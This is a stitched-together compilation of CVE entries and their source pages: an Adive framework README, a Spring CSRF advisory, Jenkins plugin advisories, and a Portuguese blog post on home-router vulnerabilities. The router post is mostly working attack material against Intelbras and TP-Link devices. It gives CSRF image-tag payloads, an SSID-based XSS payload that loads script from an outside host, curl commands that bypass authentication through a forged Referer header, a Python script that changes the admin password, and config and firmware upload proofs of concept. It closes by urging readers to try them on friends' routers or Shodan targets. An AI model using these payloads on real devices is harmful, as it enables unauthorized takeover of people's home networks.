Adive Framework 2.0.8 has admin/config CSRF to change the Administrator password.

**adive-php7**

Adive Framework for PHP7 www.adive.es

**Adive Framework 2.0.9**

Adive is a PHP 7 Framework to develope webs and online apps 10 times faster with a dashboard that manages MySQL databases, a fast, easy and great alternative to PhpMyAdmin.

This version includes a developer toolkit to generate tables, fields and entities, control forms and databases, Adive is an ambitious project from Schben, which aims to turn the "coding" in "design".

**DevToolkit login**

The path to DevToolkit is in admin/dashboard.

Default login details for ADMIN privileges are: admin:admin

Default User/Client privileges access are: user:user

**Changelog 2.0.9**

*   Bugfix: Security Site-Hash implemented to prevent outsite attacks.

**Changelog 2.0.8**

*   Bugfix: Image replacement and timestamp inclusion in temporal name.

**Changelog 2.0.7**

*   Added new security requeriments.
*   Added new field type: Passwords.

**Changelog 2.0.6**

*   Fixed bug with image post input.

**Changelog 2.0.5**

*   Fixed security bug.
*   Added new functionality with visible/invisible fields in forms.
*   Adive.time property added for parallel workflow inclusion.

**Changelog 2.0.4**

*   Fixed icon design in navigation menu.
*   Added icon to breadcrumb in insert/update view.

**Changelog 2.0.3**

*   Fixed error in upload images for C:/Fakepath.
*   Added user access management.
*   Added "Code generated" in Tables for copy/paste in Controller or HTML.

CVE-2020-7991: adive-php7/README.md at master · schspain/adive-php7

Spring Framework, versions 5.2.x prior to 5.2.3 are vulnerable to CSRF attacks through CORS preflight requests that target Spring MVC (spring-webmvc module) or Spring WebFlux (spring-webflux module) endpoints. Only non-authenticated endpoints are vulnerable because preflight requests should not include credentials and therefore requests should fail authentication. However a notable exception to this are Chrome based browsers when using client certificates for authentication since Chrome sends TLS client certificates in CORS preflight requests in violation of spec requirements. No HTTP body can be sent or received as a result of this attack.

All Vulnerability Reports

Severity

Medium

Vendor

Spring by Pivotal

Description

Spring Framework, versions 5.2.x prior to 5.2.3 are vulnerable to CSRF attacks through CORS preflight requests that target Spring MVC (spring-webmvc module) or Spring WebFlux (spring-webflux module) endpoints.

Only non-authenticated endpoints are vulnerable because preflight requests should not include credentials and therefore requests should fail authentication. However a notable exception to this are Chrome based browsers when using client certificates for authentication since Chrome sends TLS client certificates in CORS preflight requests in violation of spec requirements. 

No HTTP body can be sent or received as a result of this attack.

Affected VMware Products and Versions

Severity is medium unless otherwise noted.

*   Spring Framework
    *   5.2.0 to 5.2.2

Mitigation

Users of affected versions should apply the below mitigation.  5.2.x users should upgrade to 5.2.3.  There are no other mitigation steps necessary. Use of Spring Security with URL based security and CORS support enabled prevents exposure to this vulnerability. Releases that have fixed this issue include:

*   Spring Framework
    *   5.2.3

Credit

This issue was identified and responsibly reported by Eric Zimanyi from Google.

References

*   https://www.w3.org/TR/cors/
*   https://bugs.chromium.org/p/chromium/issues/detail?id=775438

History

2020-01-16: Initial vulnerability report published.

CVE-2020-5397: CVE-2020-5397: CSRF Attack via CORS Preflight Requests with Spring MVC or Spring WebFlux | Security

Intelbras WRN240 devices do not require authentication to replace the firmware via a POST request to the incoming/Firmware.cfg URI.

Hackers xiaomi e androids, algumas pessoas já vem me pedindo a algum tempo para falar um pouco sobre algumas vulns e exploits para roteadores (acho que é para fins educacionais), então, hoje irei falar sobre algumas vulnerabilidades presentes em alguns modelos de roteadores domésticos, os quais na maioria das vezes seus donos/usuários não se preocupam em manter sua firmware atualizado, também citarei exemplos explicando por que na maioria das vezes manter seu aparelho atualizado ainda poderá deixar passar alguns ataques.

Usarei os roteadores de marcas Intelbras e TP-Link nos exemplos, pois até agora são os únicos que tenho em mãos para realizar os testes, mas acredito que sirva de base para que vocês possam replicar os mesmos bugs em outros modelos.

Começando pelo bom e velho Intelbras, acho que tudo que tem “Intelbras” em seu nome terá esses mesmos bugs, vou citar só alguns exemplos em determinados modelos e versões, mas os bugs foram testados em outros tipos de painéis e na maioria eles estavam lá.

**CSRF****Roteador Wireless N 150 Mbps -WRN 240**

 Atire a senha do Facebook quem nunca viu esse painel na vida.

Acho que essa é a vulnerabilidade mais comum e conhecida nesses roteadores, Cross-site Request Forgery (CSRF ou XSRF), em português falsificação de solicitação entre sites, também conhecido como ataque de um clique.

Para salvar ou alterar alguma informação, seu painel adiciona esses valores em parâmetros em uma URL e faz a requisição via GET, onde essa URL é requisitada através de javascript ou iframe.

**Exemplo**

Para reiniciar o roteador, quando vamos lá no menu e clicamos no botão reiniciar, o painel faz a requisição para o endereço: http://192.168.0.1/userRpm/SysRebootRpm.htm?Reboot=Reiniciar

E então o roteador reinicia.

Poderíamos fazer o mesmo procedimento de uma maneira “escondida” do admin.

    $ echo “<img src=’http://192.168.0.1/userRpm/SysRebootRpm.htm?Reboot=Reiniciar’>” > poc.html
    

Agora podemos usar para alterar algumas outras informações como, nome da rede wifi, senhas, adicionar portas redirecionadas, mudar DNS etc.

**Vídeo salvo em 02/07/2018**

Também testado no painel do _WRN 150_

**Outro exemplo, agora com o **TP-LINK 150M Wireless N Router Model No. TL-WR740N****

    <img src="http://192.168.0.1/userRpm/VirtualServerRpm.htm?ExPort=22&InPort=22&Ip=192.168.0.100&Protocol=1&State=1&Commonport=0&Changed=0&SelIndex=0&Page=1&Save=Save">
    

**XSS**

Podemos encontrar XSS facilmente em vários inputs, principalmente se juntarmos o CSRF+XSS.

Mas vou mostrar um que achei mais “apresentável” pelo fato de que podemos encontrar o mesmo bug em outros dispositivos além de roteadores.

O XSS por SSID de um outro AP, nos roteadores podemos encontrar esse bug em páginas que mostrem SSID de outras redes, normalmente nas configurações para adicionar um novo “AP”.

Como o painel estará mostrando o nome das outras redes wireless, as vezes ele não filtra esses SSID e com isso conseguimos nosso XXS.

**Exemplo**

Subindo nosso payload:

    airbase-ng -e "</script><script src='//elb.me'>" -c 8 -v wlan0mon
    

Conteudo em _elb.me_:

**Resultado**

Tenho um post sobre isso, explicando mais detalhadamente:

*   XSS NO ROTEADOR INTELBRAS WRN 240

**Auth Bypass: Alterando firmware e configurações sem autenticar no painel**

Primeiro começarei falando de um bug que encontrei num dos roteadores da TP-Link, não vou tomar os créditos para mim pois enquanto pesquisava notei que alguém já tinha reportado os mesmos, só que em outros modelos.

As vulnerabilidades baseavam-se em conseguir alterar ou ver informações no painel do roteador somente estando na mesma rede que o dispositivo, informações que somente quem poderia ver seriam pessoas que estivessem autenticadas nessa área administrativa.

A aplicação não ignorava headers de autenticação, principalmente o "Cookie: Authorization=Basic BASE64=" mas verificava apenas o "Referer: http://ip.router/", pois para ela se o usuário estava vindo com esse header, ele certamente estaria autenticado na plataforma, isso abriu ### portas para um novo ataque.

**Exemplo**

    curl -X GET http://192.168.0.1/cgi/conf.bin
    

Resposta: HTTP/1.1 403 Forbidden

    curl -X GET -H "Referer: http://192.168.0.1/mainFrame.htm" http://192.168.0.1/cgi/conf.bin
    

Resposta: HTTP/1.1 200 OK

**Exemplo de alteração de senha do painel do roteador:**

    import requests
    
    new = input('New Pass: ')
    url = 'http://192.168.0.1/cgi?8'
    headers = {'Content-Type': 'text/plain',
     'Referer': 'http://192.168.0.1/mainFrame.htm'}
    
    data = ''
    data += '[/cgi/auth#0,0,0,0,0,0#0,0,0,0,0,0]0,3\x0d\x0a'
    data += 'oldPwd=admin\x0d\x0a'
    data += 'name=admin\x0d\x0a'
    data += 'pwd='+new+'\x0d\x0a'
    
    r = requests.post(url,data=data,headers=headers)
    
    print(r.text)
    

**Novos firmwares velhas vulns**

Atualizei minha firmware para a nova versão publicada no site do distribuidor, e decidi verificar se algo tinha mudado, e realmente o bug do Referer não estava mais lá, independente de Referer ou não, todas as requisições GET estavam sendo liberadas somente para quem tivesse o _cookie_ certo.

Mas ainda sobrou alguns lugares em que as alterações eram feitas via POST, que no caso seriam: Restaurar arquivos de backup e alterar ou atualizar a firmware.

Restaurando backup do modelo Intelbras, mesmo removendo o Authorization: Basic ainda conseguimos fazer o upload do arquivo:

Uma boa ideia para tentar, seria baixar um arquivo de backup do seu _router_ e subir o mesmo no _router_ do seu amigo:

**PoC**

    curl -i -X POST -H "Content-Type: multipart/form-data" -H "Referer: http://192.168.0.1/userRpm/BakNRestoreRpm.htm" -F data=@config.bin http://192.1680.1/incoming/RouterBakCfgUpload.cfg
    

O mesmo acontece com a opção de atualizar a firmware.

**TP-Link**

    curl -i -X POST -H "Content-Type: multipart/form-data" -H "Referer: http://192.168.0.2/mainFrame.htm" -F data=@conf.binhttp://192.168.0.2/cgi/confup
    

**Não façam isso em casa**

Por enquanto é só isso, atualizarei este post frequentemente caso tenham mais modelos e novos bugs para demonstrar, não tentem reproduzir essas peripécias em casa, tentem nos _routers_ de amigos ou no Shodan, é mais divertido 😉.

**Referências**

*   XSS NO ROTEADOR INTELBRAS WRN 240
*   intelbras dns change csrf
*   TP-LINK: Derrubando painel administrador com 1 requisição (Sem autenticação)
*   POC Router
*   TP-Link TL-WR840N/TL-WR841N - Authenticaton Bypass
*   Exploit Database Advanced Search - Title: TP-Link

Common Vulnerabilities and Exposures , Pentest , Proof of Concept

CVE-2019-19142: Hack ‘N’ Routers - Vulnerabilidades comuns em roteadores domésticos - [PT-BR]

Jenkins Gitlab Hook Plugin 1.4.2 and earlier does not escape project names in the build_now endpoint, resulting in a reflected XSS vulnerability.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Amazon EC2 Plugin
*   gitlab-hook Plugin
*   Health Advisor by CloudBees Plugin
*   Redgate SQL Change Automation Plugin
*   Robot Framework Plugin
*   Sounds Plugin

**Descriptions****CSRF vulnerability and missing permission checks in Amazon EC2 Plugin**

**SECURITY-1004 / CVE-2020-2090 (CSRF), CVE-2020-2091 (missing permission check)**  
**Severity (CVSS):** Low  
**Affected plugin: ec2**  
**Description:**

Amazon EC2 Plugin 1.47 and earlier does not perform permission checks in methods performing form validation. This allows users with Overall/Read access to Jenkins to connect to an attacker-specified URL within the AWS region using attacker-specified credentials IDs obtained through another method.

This vulnerability might also allow attackers to capture credentials stored in Jenkins. We have not been able to confirm that this is possible.

Additionally, these form validation methods do not require POST requests, resulting in a CSRF vulnerability.

Amazon EC2 Plugin 1.48 requires POST requests and Overall/Administer permission for the affected form validation methods.

**XXE vulnerability in Robot Framework Plugin**

**SECURITY-1698 / CVE-2020-2092**  
**Severity (CVSS):** High  
**Affected plugin: robot**  
**Description:**

Robot Framework Plugin 2.0.0 and earlier does not configure the XML parser to prevent XML external entity (XXE) attacks.

This allows a user able to control the input files for the 'Publish Robot Framework' post-build step to have Jenkins parse a crafted file that uses external entities for extraction of secrets from the Jenkins controller, server-side request forgery, or denial-of-service attacks.

Robot Framework Plugin 2.0.1 disables external entity resolution for its XML parser.

**CSRF vulnerability and missing permission checks in Health Advisor by CloudBees Plugin**

**SECURITY-1708 / CVE-2020-2093 (CSRF), CVE-2020-2094 (missing permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: cloudbees-jenkins-advisor**  
**Description:**

Health Advisor by CloudBees Plugin 3.0 and earlier does not perform permission checks in methods performing form validation. This allows users with Overall/Read access to send an email with fixed content to an attacker-specified recipient.

Additionally, these form validation methods do not require POST requests, resulting in a CSRF vulnerability.

Health Advisor by CloudBees Plugin 3.0.1 requires POST requests and Overall/Administer permission for the affected form validation methods.

**Redgate SQL Change Automation Plugin stored credentials in plain text**

**SECURITY-1696 / CVE-2020-2095**  
**Severity (CVSS):** Medium  
**Affected plugin: redgate-sql-ci**  
**Description:**

Redgate SQL Change Automation Plugin 2.0.4 and earlier stores a NuGet API key unencrypted in job config.xml files as part of its configuration. This credential could be viewed by users with Extended Read permission or access to the Jenkins controller file system.

Redgate SQL Change Automation Plugin 2.0.5 now stores the API key encrypted. Existing jobs need to have their configuration saved for existing plain text passwords to be overwritten.

**Reflected XSS vulnerability in gitlab-hook Plugin**

**SECURITY-1683 / CVE-2020-2096**  
**Severity (CVSS):** Medium  
**Affected plugin: gitlab-hook**  
**Description:**

gitlab-hook Plugin 1.4.2 and earlier does not escape project names in the build_now endpoint. This results in a reflected cross-site scripting vulnerability.

As of publication of this advisory, there is no fix.

**CSRF vulnerability and missing permission checks in Sounds Plugin allow OS command execution**

**SECURITY-814 / CVE-2020-2097 (permission check), CVE-2020-2098 (CSRF)**  
**Severity (CVSS):** High  
**Affected plugin: sounds**  
**Description:**

Sounds Plugin 0.5 and earlier does not perform permission checks in URLs performing form validation. This allows attackers with Overall/Read access to execute arbitrary OS commands as the OS user account running Jenkins.

Additionally, these form validation URLs do not require POST requests, resulting in a CSRF vulnerability.

As of publication of this advisory, there is no fix.

**Severity**

*   SECURITY-814: High
*   SECURITY-1004: Low
*   SECURITY-1683: Medium
*   SECURITY-1696: Medium
*   SECURITY-1698: High
*   SECURITY-1708: Medium

**Affected Versions**

*   **Amazon EC2 Plugin** up to and including 1.47
*   **gitlab-hook Plugin** up to and including 1.4.2
*   **Health Advisor by CloudBees Plugin** up to and including 3.0
*   **Redgate SQL Change Automation Plugin** up to and including 2.0.4
*   **Robot Framework Plugin** up to and including 2.0.0
*   **Sounds Plugin** up to and including 0.5

**Fix**

*   **Amazon EC2 Plugin** should be updated to version 1.48
*   **Health Advisor by CloudBees Plugin** should be updated to version 3.0.1
*   **Redgate SQL Change Automation Plugin** should be updated to version 2.0.5
*   **Robot Framework Plugin** should be updated to version 2.0.1

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   gitlab-hook Plugin
*   Sounds Plugin

Learn why we announce these issues.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Ai Ho (@j3ssiejjj)** for SECURITY-1683
*   **Federico Pellegrin** for SECURITY-1698
*   **Oleg Nenashev, CloudBees, Inc.** for SECURITY-1004
*   **Thomas de Grenier de Latour** for SECURITY-814
*   **Wadeck Follonier, CloudBees, Inc.** for SECURITY-1696

CVE-2020-2096: Jenkins Security Advisory 2020-01-15

A missing permission check in Jenkins Health Advisor by CloudBees Plugin 3.0 and earlier allows attackers with Overall/Read permission to send a fixed email to an attacker-specific recipient.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Amazon EC2 Plugin
*   gitlab-hook Plugin
*   Health Advisor by CloudBees Plugin
*   Redgate SQL Change Automation Plugin
*   Robot Framework Plugin
*   Sounds Plugin

**Descriptions****CSRF vulnerability and missing permission checks in Amazon EC2 Plugin**

**SECURITY-1004 / CVE-2020-2090 (CSRF), CVE-2020-2091 (missing permission check)**

Amazon EC2 Plugin 1.47 and earlier does not perform permission checks in methods performing form validation. This allows users with Overall/Read access to Jenkins to connect to an attacker-specified URL within the AWS region using attacker-specified credentials IDs obtained through another method.

This vulnerability might also allow attackers to capture credentials stored in Jenkins. We have not been able to confirm that this is possible.

Additionally, these form validation methods do not require POST requests, resulting in a CSRF vulnerability.

Amazon EC2 Plugin 1.48 requires POST requests and Overall/Administer permission for the affected form validation methods.

**XXE vulnerability in Robot Framework Plugin**

**SECURITY-1698 / CVE-2020-2092**

Robot Framework Plugin 2.0.0 and earlier does not configure the XML parser to prevent XML external entity (XXE) attacks.

This allows a user able to control the input files for the 'Publish Robot Framework' post-build step to have Jenkins parse a crafted file that uses external entities for extraction of secrets from the Jenkins controller, server-side request forgery, or denial-of-service attacks.

Robot Framework Plugin 2.0.1 disables external entity resolution for its XML parser.

**CSRF vulnerability and missing permission checks in Health Advisor by CloudBees Plugin**

**SECURITY-1708 / CVE-2020-2093 (CSRF), CVE-2020-2094 (missing permission check)**

Health Advisor by CloudBees Plugin 3.0 and earlier does not perform permission checks in methods performing form validation. This allows users with Overall/Read access to send an email with fixed content to an attacker-specified recipient.

Additionally, these form validation methods do not require POST requests, resulting in a CSRF vulnerability.

Health Advisor by CloudBees Plugin 3.0.1 requires POST requests and Overall/Administer permission for the affected form validation methods.

**Redgate SQL Change Automation Plugin stored credentials in plain text**

**SECURITY-1696 / CVE-2020-2095**

Redgate SQL Change Automation Plugin 2.0.4 and earlier stores a NuGet API key unencrypted in job config.xml files as part of its configuration. This credential could be viewed by users with Extended Read permission or access to the Jenkins controller file system.

Redgate SQL Change Automation Plugin 2.0.5 now stores the API key encrypted. Existing jobs need to have their configuration saved for existing plain text passwords to be overwritten.

**Reflected XSS vulnerability in gitlab-hook Plugin**

**SECURITY-1683 / CVE-2020-2096**

gitlab-hook Plugin 1.4.2 and earlier does not escape project names in the build_now endpoint. This results in a reflected cross-site scripting vulnerability.

As of publication of this advisory, there is no fix.

**CSRF vulnerability and missing permission checks in Sounds Plugin allow OS command execution**

**SECURITY-814 / CVE-2020-2097 (permission check), CVE-2020-2098 (CSRF)**

Sounds Plugin 0.5 and earlier does not perform permission checks in URLs performing form validation. This allows attackers with Overall/Read access to execute arbitrary OS commands as the OS user account running Jenkins.

Additionally, these form validation URLs do not require POST requests, resulting in a CSRF vulnerability.

As of publication of this advisory, there is no fix.

**Severity**

*   SECURITY-814: High
*   SECURITY-1004: Low
*   SECURITY-1683: Medium
*   SECURITY-1696: Medium
*   SECURITY-1698: High
*   SECURITY-1708: Medium

**Affected Versions**

*   **Amazon EC2 Plugin** up to and including 1.47
*   **gitlab-hook Plugin** up to and including 1.4.2
*   **Health Advisor by CloudBees Plugin** up to and including 3.0
*   **Redgate SQL Change Automation Plugin** up to and including 2.0.4
*   **Robot Framework Plugin** up to and including 2.0.0
*   **Sounds Plugin** up to and including 0.5

**Fix**

*   **Amazon EC2 Plugin** should be updated to version 1.48
*   **Health Advisor by CloudBees Plugin** should be updated to version 3.0.1
*   **Redgate SQL Change Automation Plugin** should be updated to version 2.0.5
*   **Robot Framework Plugin** should be updated to version 2.0.1

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   gitlab-hook Plugin
*   Sounds Plugin

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Ai Ho (@j3ssiejjj)** for SECURITY-1683
*   **Federico Pellegrin** for SECURITY-1698
*   **Oleg Nenashev, CloudBees, Inc.** for SECURITY-1004
*   **Thomas de Grenier de Latour** for SECURITY-814
*   **Wadeck Follonier, CloudBees, Inc.** for SECURITY-1696

CVE-2020-2094: Jenkins Security Advisory 2020-01-15

A missing permission check in Jenkins Amazon EC2 Plugin 1.47 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL within the AWS region using attacker-specified credentials IDs obtained through another method.

CVE-2020-2091: Jenkins Security Advisory 2020-01-15

** DISPUTED ** OutSystems Platform 10 through 11 allows ImageResourceDetail.aspx CSRF for content modifications and file uploads. NOTE: The product is self-hosted by the customer, even though it has a *.outsystemsenterprise.com domain name.) NOTE: The vendor claims that the independent researcher created the report without any type of validation and that no such vulnerability exists.

CVE-2019-12273

In Tautulli 2.1.9, CSRF in the /shutdown URI allows an attacker to shut down the remote media server. (Also, anonymous access can be achieved in applications that do not have a user login area).

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   *   For
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

*   Notifications
*   Fork 567

*   Code
*   Issues 56
*   Pull requests 27
*   Actions
*   Wiki
*   Security
*   Insights

Permalink

**Comparing changes**

Choose two branches to see what’s changed or to start a new pull request. If you need to, you can also .

**Open a pull request**

Create a new pull request by comparing changes across two branches. If you need to, you can also .

_base repository:_ Tautulli/Tautulli _base:_ v2.1.9

_head repository:_ Tautulli/Tautulli _compare:_ v2.1.10-beta

CVE-2019-19833: Comparing v2.1.9...v2.1.10-beta · Tautulli/Tautulli

Jenkins Mission Control Plugin 0.9.16 and earlier does not escape job display names and build names shown on its view, resulting in a stored XSS vulnerability exploitable by attackers able to change these properties.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Alauda DevOps Pipeline Plugin
*   Alauda Kubernetes Suport Plugin
*   Build Failure Analyzer Plugin
*   buildgraph-view Plugin
*   Gerrit Trigger Plugin
*   Mantis Plugin
*   Maven Release Plug-in Plugin
*   Mission Control Plugin
*   Pipeline Aggregator View Plugin
*   RapidDeploy Plugin
*   Redgate SQL Change Automation Plugin
*   Rundeck Plugin
*   SCTMExecutor Plugin
*   Spira Importer Plugin
*   Team Concert Plugin
*   WebSphere Deployer Plugin
*   Weibo Plugin

**Descriptions****XXE vulnerability in Maven Release Plug-in Plugin**

**SECURITY-1681 / CVE-2019-16549 (XXE), CVE-2019-16550 (CSRF)**  
**Severity (CVSS):** High  
**Affected plugin: m2release**  
**Description:**

Maven Release Plug-in Plugin retrieves XML from Nexus repository manager APIs. Maven Release Plug-in Plugin 0.16.1 and earlier does not configure the XML parser to prevent XML external entity (XXE) attacks. While Jenkins users without Overall/Administer permission are not allowed to configure a custom Nexus URL, this could still be exploited via man-in-the-middle attacks, especially if it’s not an HTTPS URL.

Additionally, a connection test form validation method does not require POST requests, resulting in a cross-site request forgery vulnerability. Combined, these two vulnerabilities allow attackers to have Jenkins parse crafted XML documents that use external entities for extraction of secrets from the Jenkins controller, server-side request forgery, or denial-of-service attacks.

Maven Release Plug-in Plugin 0.16.2 configures its XML parser to prevent XML external entity (XXE) attacks. It also now requires that requests to the connection test form validation method are done via POST, which protects from cross-site request forgery attacks.

**CSRF vulnerability and missing permission checks in Gerrit Trigger Plugin**

**SECURITY-1527 / CVE-2019-16551 (CSRF), CVE-2019-16552 (missing permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: gerrit-trigger**  
**Description:**

Gerrit Trigger Plugin 2.30.1 and earlier does not perform permission checks in methods performing form validation. This allows users with Overall/Read access to perform connection tests, connecting to an HTTP URL or SSH server using attacker-specified credentials, or determine whether files with an attacker-specified path exist on the Jenkins controller file system.

Additionally, these form validation methods do not require POST requests, resulting in a CSRF vulnerability.

Gerrit Trigger Plugin 2.30.2 requires POST requests and Overall/Administer permission for the affected form validation methods.

**CSRF vulnerability and missing permission check in Build Failure Analyzer Plugin allow ReDoS**

**SECURITY-1651 / CVE-2019-16553 (CSRF), CVE-2019-16554 (missing permission check), CVE-2019-16555 (resource consumption)**  
**Severity (CVSS):** Medium  
**Affected plugin: build-failure-analyzer**  
**Description:**

Build Failure Analyzer Plugin 1.24.1 and earlier does not perform a permission check in a method performing form validation. This allows users with Overall/Read access to supply a computationally expensive regular expression that will hang the request handling thread.

Additionally, this form validation method does not require POST requests, resulting in a CSRF vulnerability.

Build Failure Analyzer Plugin 1.24.2 requires POST requests and implements a permission check for the affected form validation methods so that only authorized users are able to submit regular expressions.

Additionally, the regular expression is implemented in an interruptible way, so that unintentionally expensive regular expression processing can be interrupted.

**Stored XSS vulnerability in Pipeline Aggregator View Plugin**

**SECURITY-1593 / CVE-2019-16564**  
**Severity (CVSS):** Medium  
**Affected plugin: pipeline-aggregator-view**  
**Description:**

Pipeline Aggregator View Plugin 1.8 and earlier does not escape the information shown on the view it provides, such as stage names or job names.

This results in a stored cross-site scripting vulnerability exploitable by users able to configure jobs, define pipeline stages, or otherwise affect the information shown by Pipeline Aggregator View Plugin.

Pipeline Aggregator View Plugin 1.9 escapes user-controlled information on the view it provides.

**Rundeck Plugin stored credentials in plain text**

**SECURITY-1636 / CVE-2019-16556**  
**Severity (CVSS):** Medium  
**Affected plugin: rundeck**  
**Description:**

Rundeck Plugin 3.6.5 and earlier stores credentials as part of its global configuration file org.jenkinsci.plugins.rundeck.RundeckNotifier.xml and job config.xml files on the Jenkins controller. These URLs could be viewed by users with Extended Read permission (in the case of job config.xml files) or access to the Jenkins controller file system.

Rundeck Plugin 3.6.6 stores credentials in its configuration encrypted once global and/or job configurations are saved again.

**Redgate SQL Change Automation Plugin stores credentials in plain text**

**SECURITY-1598 / CVE-2019-16557**  
**Severity (CVSS):** Medium  
**Affected plugin: redgate-sql-ci**  
**Description:**

Redgate SQL Change Automation Plugin 2.0.3 and earlier stores credentials unencrypted in job config.xml files on the Jenkins controller as part of its build step configuration. These credentials can be viewed by users with Extended Read permission or access to the Jenkins controller file system.

Redgate SQL Change Automation Plugin 2.0.4 stores its credentials encrypted once job configurations are saved again.

**SSL/TLS certificate validation globally and unconditionally disabled by Spira Importer Plugin**

**SECURITY-1580 / CVE-2019-16558**  
**Severity (CVSS):** Medium  
**Affected plugin: inflectra-spira-integration**  
**Description:**

Spira Importer Plugin 3.2.3 and earlier unconditionally disables SSL/TLS certificate validation for the entire Jenkins controller JVM.

Spira Importer Plugin 3.2.4 no longer disables SSL/TLS certificate validation.

**CSRF vulnerability and missing permission checks in WebSphere Deployer Plugin**

**SECURITY-1371 / CVE-2019-16559 (permission check), CVE-2019-16560 (CSRF)**  
**Severity (CVSS):** Medium  
**Affected plugin: websphere-deployer**  
**Description:**

WebSphere Deployer Plugin 1.6.1 and earlier does not perform permission checks in methods performing form validation. This allows users with Overall/Read access to perform connection tests, determine whether files with an attacker-specified path exist on the Jenkins controller file system, and obtain limited information about the Jenkins and plugin configuration based on the responses. The latter include the ability to set plugin configuration options.

Additionally, these form validation methods do not require POST requests, resulting in a CSRF vulnerability.

As of publication of this advisory, there is no fix.

**SSL/TLS certificate validation globally and unconditionally disabled by WebSphere Deployer Plugin**

**SECURITY-1581 / CVE-2019-16561**  
**Severity (CVSS):** Medium  
**Affected plugin: websphere-deployer**  
**Description:**

WebSphere Deployer Plugin 1.6.1 and earlier allows users with Overall/Read access to disable SSL/TLS certificate and hostname validation for the entire Jenkins controller JVM, or specify a new Java keystore from a file stored on the Jenkins controller filesystem.

As of publication of this advisory, there is no fix.

**Stored XSS vulnerability in buildgraph-view Plugin**

**SECURITY-1591 / CVE-2019-16562**  
**Severity (CVSS):** Medium  
**Affected plugin: buildgraph-view**  
**Description:**

buildgraph-view Plugin 1.8 and earlier does not escape the description of builds shown in its view.

This results in a stored cross-site scripting vulnerability that can be exploited by users able to change the build description.

As of publication of this advisory, there is no fix.

**Stored XSS vulnerability in Mission Control Plugin**

**SECURITY-1592 / CVE-2019-16563**  
**Severity (CVSS):** Medium  
**Affected plugin: mission-control-view**  
**Description:**

Mission Control Plugin 0.9.16 and earlier does not escape job display names and build names in the view it provides.

This results in a stored cross-site scripting vulnerability that can be exploited by users able to change these properties.

As of publication of this advisory, there is no fix.

**CSRF vulnerability and missing permission checks in Team Concert Plugin allows capturing credentials**

**SECURITY-1605 (1) / CVE-2019-16565 (CSRF), CVE-2019-16566 (missing permission check)**  
**Severity (CVSS):** High  
**Affected plugin: teamconcert**  
**Description:**

Team Concert Plugin 1.3.0 and earlier does not perform permission checks on a method implementing form validation. This allows users with Overall/Read access to Jenkins to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Additionally, the form validation method does not require POST requests, resulting in a CSRF vulnerability.

As of publication of this advisory, there is no fix.

**Users with Overall/Read access can enumerate credential IDs in Team Concert Plugin**

**SECURITY-1605 (2) / CVE-2019-16567**  
**Severity (CVSS):** Medium  
**Affected plugin: teamconcert**  
**Description:**

Team Concert Plugin 1.3.0 and earlier provides a list of applicable credential IDs to allow users configuring the plugin to select the one to use.

This functionality does not correctly check permissions, allowing any user with Overall/Read permission to get a list of valid credentials IDs. Those can be used as part of an attack to capture the credentials using another vulnerability.

As of publication of this advisory, there is no fix.

**SCTMExecutor Plugin stores credentials in plain text**

**SECURITY-1521 / CVE-2019-16568**  
**Severity (CVSS):** Low  
**Affected plugin: SCTMExecutor**  
**Description:**

SCTMExecutor Plugin 2.2 and earlier stores Silk Central credentials in the global Jenkins configuration and in job config.xml files.

While these credentials are stored encrypted on disk, they are transmitted in plain text as part of the configuration form. This can result in exposure of these credentials through browser extensions, cross-site scripting vulnerabilities, and similar situations.

As of publication of this advisory, there is no fix.

**CSRF vulnerability in Mantis Plugin**

**SECURITY-1603 / CVE-2019-16569**  
**Severity (CVSS):** Medium  
**Affected plugin: mantis**  
**Description:**

Mantis Plugin 0.26 and earlier does not require POST requests on a connection test method, resulting in a CSRF vulnerability. This allows attackers to have Jenkins connect to Mantis-related paths on an attacker-specified web server using attacker-specified credentials.

As of publication of this advisory, there is no fix.

**CSRF vulnerability and missing permission checks in RapidDeploy Plugin allow SSRF**

**SECURITY-1604 / CVE-2019-16570 (CSRF), CVE-2019-16571 (missing permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: rapiddeploy-jenkins**  
**Description:**

RapidDeploy Plugin 4.1 and earlier does not perform a permission check on form validation methods. This allows users with Overall/Read access to Jenkins to connect to RapidDeploy-related paths on an attacker-specified web server.

Additionally, these form validation methods do not require POST requests, resulting in a CSRF vulnerability.

As of publication of this advisory, there is no fix.

**Weibo Plugin stores credentials in plain text**

**SECURITY-1597 / CVE-2019-16572**  
**Severity (CVSS):** Low  
**Affected plugin: weibo**  
**Description:**

Weibo Plugin 1.0.1 and earlier stores a credential unencrypted in its global configuration file org.jenkinsci.plugins.weibo.WeiboNotifier.xml on the Jenkins controller. This credential can be viewed by users with access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**CSRF vulnerability and missing permission checks in Alauda DevOps Pipeline Plugin allows capturing credentials**

**SECURITY-1600 / CVE-2019-16573 (CSRF), CVE-2019-16574 (missing permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: alauda-devops-pipeline**  
**Description:**

